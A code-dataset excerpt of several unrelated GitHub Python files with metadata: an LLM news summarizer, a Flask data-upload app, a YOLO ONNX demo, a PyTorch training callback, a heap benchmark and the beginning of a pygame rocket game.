OpenAIGPTWrapper(openai_api_key, model=\"gpt-4\") # ClaudeWrapper(anthropic_api_key)\n\nchat_prompt_raw_1 = [\n{\"role\":\"system\",\n \"content\": \"You are a helpful news summarizer. We will provide you with a list of news articles and will ask that you summarize them and retain links to source by adding footnotes. For example, if you have a news article describing XYZ and URL to the article, you would discuss XYZ[1] and add '[1] URL' to the bottom of the message. Note that the footnotes should be counted as of the summary; you do not need to keep the numbers from the earlier order, just from your summary. In other words, footnotes should start at 1, 2, 3, etc...\"},\n{\"role\":\"user\",\n \"content\": \"The articles below are about '{query}'. Please summarize them into a short paragraph with link retained as per the earlier instructions.\\n\\n{news_articles}\"},\n]\n\nchat_prompt_raw_2 = [\n{\"role\":\"system\",\n \"content\": \"You are a helpful news summarizer. We will provide you with a list of news articles and will ask that you summarize them and retain links to source by adding footnotes. For example, if you have a news article describing XYZ and URL to the article, you would discuss XYZ[1] and add '[1] URL' to the bottom of the message. The footnote numbers should start at [1] and increase consecutively. In other words, footnotes should start at 1, 2, 3, etc. For the actual paragraph, you can reorder reference articles and choose the ones to include as to make the paragraph as informative, pithy, and concise as possible. You can also have multiple footnotes per sentence if this helps tell the story. While you should avoid adding your own commentary in most cases, feel free to do so if it will help the reader understand the context of the paragraph you are writing.\"},\n{\"role\":\"user\",\n \"content\": \"The articles below are about '{query}'. Please take on the role of an entertaining, successful, AI-driven investigative journalists and summarize them into a short paragraph. Make sure to follow the 'system' instructions.\\n\\n{news_articles}\"},\n]\n\nchat_prompt_1 = ChatPrompt(chat_prompt_raw_1)\nchat_prompt_2 = ChatPrompt(chat_prompt_raw_2)\n\n### DATA HELPERS\n\ndef create_data_set(queries, json_file):\n article_dict = {}\n news_agent = NewsSummaryAgent(news_api_api_key, name=\"tester agent\")\n for query in queries:\n news_articles = news_agent.getQuery(query, days_back=1, include_descriptions=True, max_articles=30)\n article_dict[query] = {\"articles\":news_articles}\n\n update_data_set(article_dict, json_file)\n\ndef update_data_set(dict_obj, json_file):\n with open(json_file, 'w') as writer:\n writer.write(json.dumps(dict_obj))\n\ndef load_data_set(json_file):\n articles = None\n with open(json_file, 'r') as reader:\n articles = json.loads(reader.read())\n return articles\n\n### RUNNING DATA SET CREATION\n\ncreate_data_set(queries, JSON_FILE)\n\narticles = load_data_set(JSON_FILE)\nfor query, article_dict in articles.items():\n\n print(f\"Generating news summary for '{query}'\")\n\n print(\"... llm_1\")\n llm_1_completion = llm_1.complete_chat(chat_prompt_1.fill(query=query, news_articles=article_dict['articles']))\n\n print(\"... llm_2\")\n llm_2_completion = llm_2.complete_chat(chat_prompt_2.fill(query=query, news_articles=article_dict['articles']))\n \n # Saving results...\n article_dict[\"llm_1\"] = llm_1_completion\n article_dict[\"llm_2\"] = llm_2_completion\n articles[query] = article_dict\n\nupdate_data_set(articles, JSON_FILE)", "repo_name": "wgryc/phasellm", "sub_path": "demos-and-products/newsbot/newsbot_create.py", "file_name": "newsbot_create.py", "file_ext": "py", "file_size_in_byte": 4116, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 426, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 15, "usage_type": "call"}, {"api_name": "phasellm.llms.OpenAIGPTWrapper", "line_number": 22, "usage_type": "call"}, {"api_name": "phasellm.llms.OpenAIGPTWrapper", "line_number": 23, "usage_type": "call"}, {"api_name": "phasellm.llms.ChatPrompt", "line_number": 39, "usage_type": "call"}, {"api_name": "phasellm.llms.ChatPrompt", "line_number": 40, "usage_type": "call"}, {"api_name": "phasellm.agents.NewsSummaryAgent", "line_number": 46, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "38771598060", "text": "from flask import Flask, render_template, request, flash\nfrom flask.helpers import url_for\nfrom markupsafe import Markup\nfrom werkzeug.utils import redirect, secure_filename\nimport os\n\nfrom Backend.data_processing import *\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\napp.config[\"SECRET_KEY\"] = os.urandom(24)\napp.config['TEMPLATES_AUTO_RELOAD'] = True\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nUPLOAD_ROOT = 'Backend/experimental_data/'\nUPLOAD_FOLDER = os.path.join(BASE_DIR, UPLOAD_ROOT)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nexp_design = {'data_file': None, \"significance\": None, 'iv': None, 'dv': None}\n\n@app.route('/', methods = ['GET', 'POST'])\ndef index():\n if exp_design['data_file'] is None:\n # default value for no file uploaded\n return render_template('index.html', data_file = \"No file, please choose a file to upload\")\n return render_template('index.html', data_file = exp_design['data_file'])\n\n# file operations, check that file is selected before carrying out action of upload or deletion\n@app.route(\"/upload\", methods = ['POST'])\ndef upload():\n if request.method == 'POST':\n file = request.files['experimental_data']\n if file.filename == '':\n flash(Markup(' Error: No file selected, please choose a file to upload'))\n return redirect(url_for('index'))\n\n filename = secure_filename(file.filename)\n exp_design['data_file'] = filename\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n flash('File upload successful')\n return redirect(url_for('index'))\n else:\n flash('File not uploaded. Please try again')\n return redirect(url_for('index'))\n\n@app.route(\"/del_file\", methods = [\"POST\"])\ndef del_file():\n # check if there is actually a file to delete, if there is no file just return index, \n # ensures that pressing this button will have no action if pressed by accident\n if exp_design['data_file'] is None:\n flash('No file to delete')\n return redirect(url_for('index'))\n # find file and delete, also need to notify the user of this happening\n filename = exp_design['data_file']\n exp_design['data_file'] = None\n cur_file = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n os.remove(cur_file)\n flash('File deleted')\n return redirect(url_for('index'))\n\ndef design():\n d = read_exp_design()\n exp_design['significance'] = d['significance']\n exp_design['iv'] = d['iv'].lower().replace(\" \", \"\")\n exp_design['dv'] = d['dv'].lower().replace(\" \", \"\")\n\ndef run_stats():\n # generates the report, need to run the analysis to get the stats and visualisation\n # also get the p-val from inferential stats to compare against the level given by user\n result = run_analysis(exp_design)\n p_val = get_p()\n if p_val < exp_design[\"significance\"]:\n s = True\n else:\n s = False\n\n return {\"result\": result[\"stats\"], \"vis\": result[\"vis\"], \"s\": s}\n\n@app.route('/create_report', methods = [\"GET\", \"POST\"])\ndef create_report():\n # checking that experimental data exists, first we check for file, if no file then error given\n if request.method == \"POST\":\n if exp_design['data_file'] is None:\n flash(Markup('Error: No experimental data, please upload file'))\n return redirect(url_for('index'))\n\n design()\n\n # check that experimental design exists, if either iv or dv not given then error thrown\n if len(exp_design['iv']) == 0 or len(exp_design['dv']) == 0:\n flash(Markup('Error: Variables missing, please input variables and try again'))\n return redirect(url_for('index'))\n \n return render_template('create-report.html')\n else:\n return render_template('create-report.html')\n\n# generate final report\n@app.route('/report', methods = ['GET', 'POST'])\ndef report():\n if request.method == \"POST\":\n res = run_stats()\n return render_template('report.html', stats=res['result'], vis = res[\"vis\"], significant = res['s'])\n else:\n # if no report is present, just send empty values\n return render_template('report.html', stats = {}, vis = None, significant = None)\n\n\nif __name__ == \"__main__\":\n app.run()", "repo_name": "MFStevenson/IndividualProject", "sub_path": "app/src/main/python/UI/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4312, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "os.urandom", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 34, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 34, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 35, "usage_type": "call"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 40, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 43, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 51, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 58, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 82, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 84, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 84, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 91, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 91, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.helpers.url_for", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 94, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 101, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 101, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "32589173839", "text": "# This code sample using onnxruntime packege by Microsoft (It's only provided for Linux)\n#\n\nimport numpy as np\nimport onnxruntime as rt\nfrom PIL import Image,ImageDraw\nsess = rt.InferenceSession(\"tiny_yolov2/model.onnx\")\ninput_name = sess.get_inputs()[0].name\n\nimg = Image.open('test.jpg')\nimg = img.resize((416, 416)) #for tiny_yolov2\n\nX = np.asarray(img)\nX = X.transpose(2,0,1)\nX = X.reshape(1,3,416,416)\nprint(X.shape)\n\nprint(input_name)\nout = sess.run(None, {input_name: X.astype(np.float32)})\nprint(out[0].shape)\nout = out[0][0]\n\nnumClasses = 20\nanchors = [1.08, 1.19, 3.42, 4.41, 6.63, 11.38, 9.42, 5.11, 16.62, 10.52]\n\ndef sigmoid(x, derivative=False):\n return x*(1-x) if derivative else 1/(1+np.exp(-x))\n\ndef softmax(x):\n\tscoreMatExp = np.exp(np.asarray(x))\n\treturn scoreMatExp / scoreMatExp.sum(0)\n\nclut = [(0,0,0),(255,0,0),(255,0,255),(0,0,255),(0,255,0),(0,255,128),\n\t\t(128,255,0),(128,128,0),(0,128,255),(128,0,128),\n\t\t(255,0,128),(128,0,255),(255,128,128),(128,255,128),(255,255,0),\n\t\t(255,0,128),(128,0,255),(255,128,128),(128,255,128),(255,255,0),\n\t\t]\nprint(len(clut))\nlabel = [\"aeroplane\",\"bicycle\",\"bird\",\"boat\",\"bottle\",\n \"bus\",\"car\",\"cat\",\"chair\",\"cow\",\"diningtable\",\"dog\",\"horse\",\n \"motorbike\",\"person\",\"pottedplant\",\"sheep\",\"sofa\",\"train\",\"tvmonitor\"]\n\n\ndraw = ImageDraw.Draw(img)\nfor cy in range(0,13):\n\tfor cx in range(0,13):\n\t\tfor b in range(0,5):\n\t\t\tchannel = b*(numClasses+5)\n\t\t\ttx = out[channel ][cy][cx]\n\t\t\tty = out[channel+1][cy][cx]\n\t\t\ttw = out[channel+2][cy][cx]\n\t\t\tth = out[channel+3][cy][cx]\n\t\t\ttc = out[channel+4][cy][cx]\n\n\t\t\tx = (float(cx) + sigmoid(tx))*32\n\t\t\ty = (float(cy) + sigmoid(ty))*32\n\t\t\t\n\t\t\tw = np.exp(tw) * 32 * anchors[2*b ]\n\t\t\th = np.exp(th) * 32 * anchors[2*b+1]\t\n\t\t\t\n\t\t\tconfidence = sigmoid(tc)\n\n\t\t\tclasses = np.zeros(numClasses)\n\t\t\tfor c in range(0,numClasses):\n\t\t\t\tclasses[c] = out[channel + 5 +c][cy][cx]\n\t\t\tclasses = softmax(classes)\n\t\t\tdetectedClass = classes.argmax()\n\n\t\t\tif 0.5< classes[detectedClass]*confidence:\n\t\t\t\tcolor =clut[detectedClass]\n\t\t\t\tprint(detectedClass,label[detectedClass],classes[detectedClass]*confidence)\n\t\t\t\tx = x - w/2\n\t\t\t\ty = y - h/2\n\t\t\t\tdraw.line((x ,y ,x+w,y ),fill=color)\n\t\t\t\tdraw.line((x ,y ,x ,y+h),fill=color)\n\t\t\t\tdraw.line((x+w,y ,x+w,y+h),fill=color)\n\t\t\t\tdraw.line((x ,y+h,x+w,y+h),fill=color)\n\nimg.save(\"result.png\")\n", "repo_name": "shi3z/onnx-example", "sub_path": "yolo-ms-onnxruntime.py", "file_name": "yolo-ms-onnxruntime.py", "file_ext": "py", "file_size_in_byte": 2333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "onnxruntime.InferenceSession", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 10, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 30, "usage_type": "call"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 44, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "39958181177", "text": "import torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom validation import _AccuracyMeter, OneHotAccuracy\nfrom session import LossMeter, EvalModel\nfrom callbacks import *\nimport util\nfrom Loss.triplet import *\nfrom torch.utils.tensorboard import SummaryWriter\nfrom tqdm import tqdm_notebook as tqdm\nimport numpy as np\n\nclass SelectiveSequential(nn.Module):\n def __init__(self, to_select, modules_dict):\n super(SelectiveSequential, self).__init__()\n for key, module in modules_dict.items():\n self.add_module(key, module)\n self._to_select = to_select\n \n def forward(self, x):\n list = []\n for name, module in self._modules.items():\n x = module(x)\n if name in self._to_select:\n list.append((x, name))\n return list\n\nclass CustomOneHotAccuracy(OneHotAccuracy):\n def __init__(self):\n super().__init__()\n self.reset()\n\n def update(self, output, label):\n return super().update(output[-1][0], label)\n\nclass EmbeddingSpaceValidator(TrainCallback):\n def __init__(self, val_data, select, accuracy_meter_fn, model_file=None):\n self.val_data = val_data\n self.val_accuracy_meter = accuracy_meter_fn()\n self.train_accuracy_meter = accuracy_meter_fn()\n self.select=select\n self.names=[\"\" for x in range(len(self.select) - 1)]\n \n self.train_accuracies = []\n self.batch_train_accuracies = []\n self.val_accuracies = []\n \n self.train_losses = []\n self.batch_train_losses = []\n self.train_raw_losses = []\n self.val_losses = []\n self.val_raw_losses = []\n \n self.batch_train_embedding_losses = [[] for x in range(len(self.select) - 1)]\n self.train_embedding_losses = [[] for x in range(len(self.select) - 1)]\n \n self.train_embedding_loss_meters = [LossMeter() for x in range(len(self.select) - 1)]\n self.val_embedding_losses = [[] for x in range(len(self.select) - 1)]\n \n self.num_batches = 0\n self.num_epochs = 0\n \n self.epochs = []\n\n self.model_file = model_file\n\n self.best_accuracy = 0\n\n def run(self, session, lossMeter=None):\n self.val_accuracy_meter.reset()\n \n val_loss = LossMeter()\n val_raw_loss = LossMeter()\n embedding_losses = [LossMeter() for x in range(len(self.select) - 1)]\n \n with EvalModel(session.model):\n for input, label, *_ in tqdm(self.val_data, desc=\"Validating\", leave=False):\n label = Variable(util.to_gpu(label))\n output = session.forward(input)\n \n step_loss = session.criterion(output, label).data.cpu()\n \n val_loss.update(step_loss, input.shape[0])\n \n val_raw_loss.update(F.multi_margin_loss(output[-1][0], label).data.cpu(), input.shape[0])\n \n self.val_accuracy_meter.update(output, label)\n\n for idx, (layer, embedding_loss) in enumerate(zip(output[:-1], embedding_losses)): \n if layer[1] in self.select:\n self.names[idx] = layer[1]\n embedding_loss.update(batch_all_triplet_loss(layer[0].view(layer[0].size(0), -1), label, 1).data.cpu())\n \n self.val_losses.append(val_loss.raw_avg.item())\n self.val_raw_losses.append(val_raw_loss.raw_avg.item())\n \n accuracy = self.val_accuracy_meter.accuracy()\n\n if self.model_file != None and accuracy > self.best_accuracy:\n session.save(self.model_file)\n self.best_accuracy = accuracy\n \n self.val_accuracies.append(accuracy)\n \n for meter, loss in zip(embedding_losses, self.val_embedding_losses):\n loss.append(meter.raw_avg) \n \n def on_epoch_begin(self, session):\n self.train_accuracy_meter.reset() \n self.train_raw_loss_meter = LossMeter()\n \n def on_epoch_end(self, session, lossMeter): \n self.train_accuracies.append(self.train_accuracy_meter.accuracy())\n self.train_losses.append(lossMeter.debias.data.cpu().item())\n \n self.train_raw_losses.append(self.train_raw_loss_meter.raw_avg.data.cpu().item())\n \n self.run(session, lossMeter) \n self.epochs.append(self.num_batches)\n self.num_epochs += 1\n \n for meter, loss in zip(self.train_embedding_loss_meters, self.train_embedding_losses):\n loss.append(meter.raw_avg)\n meter.reset()\n \n print(\"\\nval accuracy: \", round(self.val_accuracies[-1], 4),\n \"\\ntrain loss: \", round(self.train_losses[-1], 4) , \n \" train cross entropy loss : \", round(self.train_raw_losses[-1], 4) , \n \"\\nvalid loss: \", round(self.val_losses[-1], 4), \n \" valid cross entropy loss : \", round(self.val_raw_losses[-1], 4))\n \n def on_batch_end(self, session, lossMeter, output, label):\n label = Variable(util.to_gpu(label))\n batch_accuracy = self.train_accuracy_meter.update(output, label)\n self.batch_train_accuracies.append(batch_accuracy)\n self.batch_train_losses.append(lossMeter.loss.data.cpu().item()) \n self.train_raw_loss_meter.update(F.multi_margin_loss(output[-1][0], label).data.cpu(), label.shape[0])\n \n for layer, loss_meter in zip(output[:-1], self.train_embedding_loss_meters):\n if layer[1] in self.select:\n loss_meter.update(batch_all_triplet_loss(layer[0].view(layer[0].size(0), -1), label, 1).data.cpu().item())\n \n self.num_batches += 1\n \n def plot(self, title=\"\", file=None):\n fig, (ax1, ax2, ax3, ax4) = plt.subplots(nrows=4, ncols=1, figsize=(15, 15))\n\n fig.suptitle(f\"{title} : Best Accuracy {np.max(self.val_accuracies)}\", fontsize=14)\n \n ax1.set_title(f\"Accuracy per Iteration\")\n\n ax1.plot(self.epochs, self.train_accuracies, label=\"Training\")\n\n ax1.plot(self.epochs, self.val_accuracies, label=\"Validation\")\n\n ax2.set_title(f\"Loss per Iteration\")\n \n ax2.plot(self.epochs, self.train_losses, label=\"Training\")\n \n ax2.plot(self.epochs, self.val_losses, label=\"Validation\")\n\n ax3.set_title(f\"Multi-class Hinge Loss per Iteration\")\n \n ax3.plot(self.epochs, self.train_raw_losses, label=\"Training\")\n \n ax3.plot(self.epochs, self.val_raw_losses, label=\"Validation\")\n \n ax4.set_title(\"Triplet Loss per Iteration\")\n\n for embedding, name in zip(self.train_embedding_losses, self.names):\n ax4.plot(self.epochs, embedding, label=f\"Training: {name}\")\n \n for embedding, name in zip(self.val_embedding_losses, self.names):\n ax4.plot(self.epochs, embedding, label=f\"Validation: {name}\")\n \n for ax in (ax1, ax2, ax3, ax4):\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5)) \n\n plt.show()\n\n if file is not None: fig.savefig(file)\n\n\ndef tensorboard_embeddings(model, select, dataloader, targets, images, board='./runs'):\n old_select = model._to_select\n model._to_select = select\n writer = SummaryWriter(board)\n \n outputs = {name: [] for name in select}\n \n with EvalModel(model):\n for input, label in dataloader:\n output = model.forward(Variable(util.to_gpu(input)))\n for layer in output: \n outputs[layer[1]].append(layer[0].data.cpu().view(layer[0].size(0), -1)) \n \n for name, output in outputs.items():\n cat = torch.cat(output)\n writer.add_embedding(cat, tag=name, metadata=targets, label_img=images)\n", "repo_name": "drakesvoboda/deep.lib.anonymous", "sub_path": "Models/selective_sequential.py", "file_name": "selective_sequential.py", "file_ext": "py", "file_size_in_byte": 8022, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "validation.OneHotAccuracy", "line_number": 29, "usage_type": "name"}, {"api_name": "session.LossMeter", "line_number": 58, "usage_type": "call"}, {"api_name": "session.LossMeter", "line_number": 73, "usage_type": "call"}, {"api_name": "session.LossMeter", "line_number": 74, "usage_type": "call"}, {"api_name": "session.LossMeter", "line_number": 75, "usage_type": "call"}, {"api_name": "session.EvalModel", "line_number": 77, "usage_type": "call"}, {"api_name": "session.model", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm_notebook", "line_number": 78, "usage_type": "call"}, {"api_name": "util.to_gpu", "line_number": 79, "usage_type": "call"}, {"api_name": "session.forward", "line_number": 80, "usage_type": "call"}, {"api_name": "session.criterion", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.functional.multi_margin_loss", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 86, "usage_type": "name"}, {"api_name": "session.save", "line_number": 101, "usage_type": "call"}, {"api_name": "session.LossMeter", "line_number": 111, "usage_type": "call"}, {"api_name": "util.to_gpu", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn.functional.multi_margin_loss", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 190, "usage_type": "call"}, {"api_name": "session.EvalModel", "line_number": 194, "usage_type": "call"}, {"api_name": "util.to_gpu", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 201, "usage_type": "call"}]} +{"seq_id": "5589111039", "text": "import IHeap\nfrom BinaryTreeInArrayBasedHeap import BinaryTreeInArrayBasedHeap\nfrom SimpleArrayBasedHeap import SimpleArrayBasedHeap\nfrom BinaryTreeWithNodesBasedHeap import BinaryTreeWithNodesBasedHeap\nfrom DefaultPythonHeap import DefaultPythonHeap\n\n\nfrom typing import List\nimport random\nimport time\n\n\nINITIAL_ELEMENTS_NUM: int = 10\nINITIAL_ELEMENTS_VALUES_RANGE: int = 100\nADD_ELEMENTS_REPEAT_NUM: int = 15000\nREMOVE_ELEMENTS_REPEAT_NUM: int = 1500\n\nNUM_TEST_ITERATIONS: int = 20\nNUM_DIGITS_AFTER_DECIMAL_POINT: int = 4\n\n\ndef modifyHeap(heap: IHeap, action: str) -> None:\n if action == \"add\":\n for repeat in range(ADD_ELEMENTS_REPEAT_NUM):\n heap.add(random.randrange(0, 100000))\n elif action == \"remove\":\n for repeat in range(REMOVE_ELEMENTS_REPEAT_NUM):\n heap.getAndRemoveSmallest()\n\n\ndef benchmarkHeapImplementation(heapImplementation: IHeap) -> None:\n runTimes: List = []\n for test in range(NUM_TEST_ITERATIONS):\n start: float = time.clock()\n\n executeQueries(heapImplementation)\n\n end: float = time.clock()\n runTimes.append(end - start)\n\n print(round(sum(runTimes) / NUM_TEST_ITERATIONS, NUM_DIGITS_AFTER_DECIMAL_POINT))\n\n\ndef executeQueries(h: IHeap) -> None:\n with open(\"TestingActions.txt\") as ta:\n for action in ta:\n modifyHeap(h, action.strip())\n\n\ndef main():\n initialElements: List = [random.randrange(INITIAL_ELEMENTS_VALUES_RANGE) for _ in range(INITIAL_ELEMENTS_NUM)]\n benchmarkHeapImplementation(SimpleArrayBasedHeap(initialElements)) # 11.211\n benchmarkHeapImplementation(BinaryTreeInArrayBasedHeap(initialElements)) # 1.2617\n benchmarkHeapImplementation(BinaryTreeWithNodesBasedHeap(initialElements)) # 3.1434 -> 5.914\n benchmarkHeapImplementation(DefaultPythonHeap(initialElements)) # 0.772\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "zseen/data-structures-practice", "sub_path": "HeapVariations/RuntimeTestOfHeaps.py", "file_name": "RuntimeTestOfHeaps.py", "file_ext": "py", "file_size_in_byte": 1870, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.randrange", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}, {"api_name": "time.clock", "line_number": 34, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 38, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 51, "usage_type": "name"}, {"api_name": "random.randrange", "line_number": 51, "usage_type": "call"}, {"api_name": "SimpleArrayBasedHeap.SimpleArrayBasedHeap", "line_number": 52, "usage_type": "call"}, {"api_name": "BinaryTreeInArrayBasedHeap.BinaryTreeInArrayBasedHeap", "line_number": 53, "usage_type": "call"}, {"api_name": "BinaryTreeWithNodesBasedHeap.BinaryTreeWithNodesBasedHeap", "line_number": 54, "usage_type": "call"}, {"api_name": "DefaultPythonHeap.DefaultPythonHeap", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "17267778405", "text": "from rocketclass import Rocket\nfrom Worm import WormHole\nfrom Asteroid import Asteroid1\nimport pygame, sys\nfrom pygame.locals import *\n \npygame.init()\n\nbackground = pygame.image.load(\"Supernova-Hunters-800x533.png\")\nRocketbg = pygame.image.load(\"rocketbg.png\")\nRocketImage = pygame.transform.scale(Rocketbg,(41,62))\nasteroid = pygame.image.load(\"asteroid-icon.png\")\nast= pygame.transform.scale(asteroid, (50,50))\narrows = pygame.image.load(\"arrow-keys-clipart-8-buttons.png\")\naa= pygame.transform.scale(arrows, (150,150))\nstarbg = pygame.image.load(\"stars-in-night-sky.png\")\nwormhole2 = pygame.image.load(\"wormhole.png\")\nwormhole1 = pygame.transform.scale(wormhole2,(70,70))\nsoundbg = pygame.image.load(\"Space-PNG-Clipart.png\")\ninstrbg = pygame.image.load(\"space-png-1920.png\")\n \nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (177, 227, 102)\nBRIGHT_GREEN = (205, 237, 157)\nRED = (234, 53, 70)\nBRIGHT_RED = (241,126,137)\nBRIGHT_Blue = (135,212,223)\nBlue = (67,188,205)\n\n\n\nspeed = 1\nSCREENWIDTH = 800\nSCREENHEIGHT = 500\nsize = (SCREENWIDTH, SCREENHEIGHT)\nscreen = pygame.display.set_mode(size)\n\nASTEROID_sprites_lists = pygame.sprite.Group()\n\nObs = Asteroid1(ast, 10, 10)\nObs1 = Asteroid1(ast, 10, 10)\nObs2 = Asteroid1(ast, 10, 10)\nObs3 = Asteroid1(ast, 10, 10)\nObs4 = Asteroid1(ast, 10, 10)\nObs5 = Asteroid1(ast, 10, 10)\nObs6 = Asteroid1(ast, 10, 10)\nObs7 = Asteroid1(ast, 10, 10)\nObs8 = Asteroid1(ast, 10, 10)\nObs9 = Asteroid1(ast, 10, 10)\nObs10 = Asteroid1(ast, 10, 10)\nObs11 = Asteroid1(ast, 10, 10)\nObs12 = Asteroid1(ast, 10, 10)\nObs13 = Asteroid1(ast, 10, 10)\nObs14 = Asteroid1(ast, 10, 10)\nObs15 = Asteroid1(ast, 10, 10)\nObs16 = Asteroid1(ast, 10, 10)\nObs17 = Asteroid1(ast, 10, 10)\nObs18 = Asteroid1(ast, 10, 10)\nObs19 = Asteroid1(ast, 10, 10)\nObs20 = Asteroid1(ast, 10, 10)\nObs21 = Asteroid1(ast, 10, 10)\nObs22 = Asteroid1(ast, 10, 10)\nObs23 = Asteroid1(ast, 10, 